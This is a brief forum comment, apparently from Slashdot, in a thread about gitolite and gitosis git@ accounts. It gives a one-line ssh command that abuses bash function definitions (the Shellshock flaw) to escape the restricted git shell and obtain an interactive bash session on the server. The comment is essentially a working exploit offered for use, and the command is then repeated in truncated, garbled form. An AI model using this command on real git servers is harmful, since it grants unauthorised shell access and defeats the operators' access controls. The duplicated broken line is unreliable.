Comment Re:git@ shell accounts using gitolite and gitosis (Score 1) 399
Even better, if you have an access to git server you can do:
ssh git@gitserver '() { echo $1; }; /bin/bash'
and you get an interactive bash session.
ssh git@gitserver '() { echo $1; };
and you get an interactive bash session.